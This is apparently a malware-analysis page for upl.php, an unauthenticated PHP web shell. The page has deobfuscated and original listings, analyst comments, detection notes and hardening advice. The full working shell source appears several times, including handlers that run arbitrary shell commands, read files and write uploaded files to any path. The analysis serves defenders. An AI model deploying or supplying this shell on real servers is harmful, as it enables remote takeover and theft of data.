PHP Malware Analysis

upl.php

md5: 7f904e8caca64148c6dd51ba21d0d692


Screenshot


Attributes

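Encoding: base64_decode() (decodes the `data` request field before it is written to disk)

Execution: shell_exec() (called with the `command` request field)

Files: file_get_contents(), file_put_contents(), scandir(), is_dir(), mkdir(), chmod()

Input: $_POST (fields read in the listing below: cmd, file, command, dir, data)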


Deobfuscated PHP code

// Analyst summary: a small POST-driven file manager / command runner (web shell).
// It has no authentication or origin check of any kind: the only gate is that the
// request carries a non-empty `cmd` field. Every handler answers {"code":200}
// without checking whether the underlying call succeeded, so the response body
// says nothing about the outcome of the operation.
//
// Detection notes: traffic to this file consists of POST requests whose `cmd`
// value is one of test, get_file_data, get_files, get_dir, shell_exec, mkdir,
// upload. POST bodies are usually not written to access logs, so request-body
// inspection (WAF / proxy) or file-integrity monitoring of web-writable
// directories is the more reliable place to look.

// Serialises $data as JSON and writes it to the response. No Content-Type header
// is set here, so the reply goes out with whatever default the server uses.
function echo_json($data=[]) {
    echo json_encode( $data );
}

// Dispatcher: runs only when a non-empty `cmd` field is posted. The branches are
// independent `if`s compared with loose `==`, not an if/else chain.
if( !empty( $_POST['cmd'] ) ){

    // "test": liveness probe; lets the operator confirm the file is reachable.
    if( $_POST['cmd'] == "test" ){
        echo_json([
            "code" => 200,
        ]);
    }

    // "get_file_data": returns the content of a file. The requested name is
    // appended to __DIR__ without any normalisation or allow-list, so the read is
    // not confined to this directory. A failed read yields false in "data".
    if( $_POST['cmd'] == "get_file_data" ){
        $data = file_get_contents( __DIR__ . '/' . $_POST['file'] );
        echo_json([
            "code" => 200,
            "data" => $data,
        ]);
    }

    // "get_files": lists the script's directory and, for each subdirectory, one
    // further level. Entries are tagged "d" (directory) or "f" (anything else).
    if( $_POST['cmd'] == "get_files" ){
        $struct = [];
        $files = scandir( __DIR__ );
        foreach ($files as $file) {
            // Skip the self/parent entries at the top level only.
            if( $file == '.' || $file == '..' ){
                continue;
            }
            if( is_dir( __DIR__ . '/' . $file ) ){
                // The nested listing is returned unfiltered, so it still contains
                // the '.' and '..' entries.
                $sub_files = scandir( __DIR__ . '/' . $file );
                $struct[] = [
                    "file" => $file,
                    "type" => "d",
                    "sub_files" => $sub_files,
                ];
            }else{
                $struct[] = [
                    "file" => $file,
                    "type" => "f",
                ];
            }
        }
        echo_json([
            "code" => 200,
            "struct" => $struct,
        ]);
    }

    // "get_dir": discloses the absolute filesystem path of the directory that
    // holds this script.
    if( $_POST['cmd'] == "get_dir" ){
        echo_json([
            "code" => 200,
            "dir" => __DIR__,
        ]);
    }

    // "shell_exec": passes the `command` field to the system shell with the
    // privileges of the PHP process. The return value is discarded, so command
    // output is not sent back in the response.
    if( $_POST['cmd'] == "shell_exec" ){
        shell_exec( $_POST['command'] );
        echo_json([
            "code" => 200,
        ]);
    }

    // "mkdir": creates a directory at the posted path and sets mode 0755. Unlike
    // the read handlers, the path is used as given, with no __DIR__ prefix.
    if( $_POST['cmd'] == "mkdir" ){
        mkdir( $_POST['dir'] );
        chmod( $_POST['dir'] , 0755 );
        echo_json([
            "code" => 200,
        ]);
    }

    // "upload": writes the base64-decoded `data` field to the posted path (again
    // used as given) and sets mode 0644. This is the file-drop primitive: it can
    // create new files or overwrite existing ones the PHP process may write to.
    if( $_POST['cmd'] == "upload" ){
        file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) );
        chmod( $_POST['file'] , 0644 );
        echo_json([
            "code" => 200,
        ]);
    }
}

Execution traces

data/traces/7f904e8caca64148c6dd51ba21d0d692_trace-1676242538.4633.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:56:04.361108]
1	0	1	0.000154	393512
1	3	0	0.000195	394312	{main}	1		/var/www/html/uploads/upl.php	0	0
1	3	1	0.000212	394312
			0.000237	314224
TRACE END   [2023-02-12 20:56:04.361222]


Generated HTML code

<!-- Analyst note: this captured output is the script's own source, HTML-escaped ("=&gt;" for "=>"), rather than a JSON response. Together with the execution trace on this page, which records only {main} and no call into echo_json or any handler, it indicates that the file's content was emitted as literal text in this sandbox run; presumably the submitted sample carries no PHP opening tag (not confirmable from this page). The output therefore shows no runtime behaviour, and the sample's capabilities have to be read from the code listing itself. -->
<html><head></head><body>function echo_json($data=[]) { echo json_encode( $data ); } if( !empty( $_POST['cmd'] ) ){ if( $_POST['cmd'] == "test" ){ echo_json([ "code" =&gt; 200, ]); } if( $_POST['cmd'] == "get_file_data" ){ $data = file_get_contents( __DIR__ . '/' . $_POST['file'] ); echo_json([ "code" =&gt; 200, "data" =&gt; $data, ]); } if( $_POST['cmd'] == "get_files" ){ $struct = []; $files = scandir( __DIR__ ); foreach ($files as $file) { if( $file == '.' || $file == '..' ){ continue; } if( is_dir( __DIR__ . '/' . $file ) ){ $sub_files = scandir( __DIR__ . '/' . $file ); $struct[] = [ "file" =&gt; $file, "type" =&gt; "d", "sub_files" =&gt; $sub_files, ]; }else{ $struct[] = [ "file" =&gt; $file, "type" =&gt; "f", ]; } } echo_json([ "code" =&gt; 200, "struct" =&gt; $struct, ]); } if( $_POST['cmd'] == "get_dir" ){ echo_json([ "code" =&gt; 200, "dir" =&gt; __DIR__, ]); } if( $_POST['cmd'] == "shell_exec" ){ shell_exec( $_POST['command'] ); echo_json([ "code" =&gt; 200, ]); } if( $_POST['cmd'] == "mkdir" ){ mkdir( $_POST['dir'] ); chmod( $_POST['dir'] , 0755 ); echo_json([ "code" =&gt; 200, ]); } if( $_POST['cmd'] == "upload" ){ file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) ); chmod( $_POST['file'] , 0644 ); echo_json([ "code" =&gt; 200, ]); } }</body></html>

Original PHP code

// Sample as submitted, kept on a single line exactly as captured.
// What it is: an unauthenticated POST-driven web shell. A non-empty `cmd` field
// selects one of seven handlers:
//   test          - liveness check
//   get_file_data - return a file's content (name appended to __DIR__, unfiltered)
//   get_files     - list this directory plus one level of subdirectories
//   get_dir       - return the absolute path of this directory
//   shell_exec    - run the `command` field in the system shell (output discarded)
//   mkdir         - create a directory at the posted path, mode 0755
//   upload        - write base64-decoded `data` to the posted path, mode 0644
// Every handler replies {"code":200} whether or not the operation succeeded.
// Hardening relevant to this sample: serve upload directories with script
// execution disabled, keep the web root non-writable for the PHP user, and
// consider listing shell_exec in disable_functions where it is not needed.
function echo_json($data=[]) { echo json_encode( $data ); } if( !empty( $_POST['cmd'] ) ){ if( $_POST['cmd'] == "test" ){ echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "get_file_data" ){ $data = file_get_contents( __DIR__ . '/' . $_POST['file'] ); echo_json([ "code" => 200, "data" => $data, ]); } if( $_POST['cmd'] == "get_files" ){ $struct = []; $files = scandir( __DIR__ ); foreach ($files as $file) { if( $file == '.' || $file == '..' ){ continue; } if( is_dir( __DIR__ . '/' . $file ) ){ $sub_files = scandir( __DIR__ . '/' . $file ); $struct[] = [ "file" => $file, "type" => "d", "sub_files" => $sub_files, ]; }else{ $struct[] = [ "file" => $file, "type" => "f", ]; } } echo_json([ "code" => 200, "struct" => $struct, ]); } if( $_POST['cmd'] == "get_dir" ){ echo_json([ "code" => 200, "dir" => __DIR__, ]); } if( $_POST['cmd'] == "shell_exec" ){ shell_exec( $_POST['command'] ); echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "mkdir" ){ mkdir( $_POST['dir'] ); chmod( $_POST['dir'] , 0755 ); echo_json([ "code" => 200, ]); } if( $_POST['cmd'] == "upload" ){ file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) ); chmod( $_POST['file'] , 0644 ); echo_json([ "code" => 200, ]); } }